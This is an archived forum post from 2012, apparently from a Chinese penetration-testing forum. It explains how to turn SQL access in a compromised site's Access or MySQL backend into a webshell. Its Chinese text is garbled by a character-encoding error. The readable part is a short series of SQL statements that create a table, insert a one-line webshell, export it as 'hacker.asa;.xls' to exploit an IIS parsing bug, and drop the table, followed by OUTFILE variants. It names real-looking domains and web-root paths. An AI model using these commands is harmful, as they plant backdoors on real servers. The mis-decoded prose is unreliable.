ACCESSÖ´ÐÐSQLÃüÁîµ¼³öÒ»¾ä»°SHELL

admin ·¢±íÓÚ 2012-9-13 17:53:58

ºÃ²»ÈÝÒ×½øÁËºóÌ¨£¬·¢ÏÖÉ¶ÉÏ´«°¡¡£±¸·Ý°¡¶àÄ¾ÓÐ¡£
webshellÒ»Ö±ÄÃ²»µ½¡£ºóÀ´·ÁËÒ»ÏÂÔ´Âë¡£ÓÐÒ»¸öÖ´ÐÐSQLÃüÁîµÄ
ÎÄ¼þ¡£¿ÉºóÌ¨Ã»ÏÔÊ¾Õâ¹¦ÄÜ¡£Ö±½ÓÌîÉÏÎÄ¼þÃû×Ö£¬Ö´ÐÐÃüÁîµÄÑ¡Ïî³öÀ´ÁË£¬
È»ºó¾ÍÊÔÓÃÁËÏÂÃæµÄÃüÁîµ¼³öÒ»¾ä»°Ä¾Âí¡£Ã»Ïëµ½³É¹¦ÁË¡£ÃüÁî·½·¨ÈçÏÂ£º
1.create table cmd (a varchar(50))
2.insert into cmd (a) values (¡®¡®)
3.select * into in ¡®D:\wwwroot\www.koohik.com\hacker.asa;.xls¡¯ ¡®excel 4.0;¡¯ from cmd
(°Ñ±ícmdµÄÄÚÈÝµ¼³öÎªÎïÀíÂ·¾¶µÄÒ»¸öEXCELÎÄ¼þ)
4.drop table cmd
ÀûÓÃIISµÄBUG³É¹¦ÄÃµ½ÁËWEBSHELL¡£

Ö±½Ó²Ëµ¶ÀïÁ¬½Óhttp://www.chouwazi.com/data/xiao.asp;xiao.xlsÒ»¾ä»°

¡¡¡¡SQLÓï¾äÒâË¼½âÊÍ£º
¡¡¡¡µÚÒ»¾ä
¡¡¡¡½¨Á¢Ò»¸öÓÐÒ»¸öA×Ö¶ÎµÄ±í ±íÃûÎªcmd ×Ö¶ÎÀàÐÍÎª×Ö·û ³¤¶ÈÎª50

¡¡¡¡µÚ¶þ¾ä
¡¡¡¡ÔÚ±ícmdµÄa×Ö¶Î²åÈëÒ»¾ä»°Ä¾Âí
¡¡¡¡µÚÈý¾ä
¡¡¡¡°Ñcmd±íaµÄÄÚÈÝµ¼³öµ½Â·¾¶e:\host\chouwazi.com\web\data\µÄEXCELÎÄ¼þ

¡¡¡¡µÚËÄ¾ä
¡¡¡¡É¾³ý½¨Á¢µÄcmd±í

¡¡¡¡ÒÔÏÂÄÚÈÝÎª²âÊÔ£º
¡¡¡¡AccessÀûÓÃºóÌ¨SQLÖ´ÐÐÃüÁî¹¦ÄÜµ¼³öWebShell:
¡¡¡¡Õâ¸ö¸ü¼òµ¥£º
¡¡¡¡Select 'aspÒ»¾ä»°Ä¾Âí' into in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote
¡¡¡¡»òÕß
¡¡¡¡Select 'phpÒ»¾ä»°Ä¾Âí' into outfile 'F:/wwwroot/chouwazi.com/eval.php';

¡¡¡¡ºóÌ¨ÓÐÖ´ÐÐSQLÓï¾ä¹¦ÄÜ(voteÎªÒÑÖª±í¶Î)
¡¡¡¡Ï£Íû¶Ô´ó¼ÒÓÐËù°ïÖúÄÃshellµÄÓÖÒ»¸öË¼Â·

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

ACCESSÖ´ÐÐSQLÃüÁîµ¼³öÒ»¾ä»°SHELL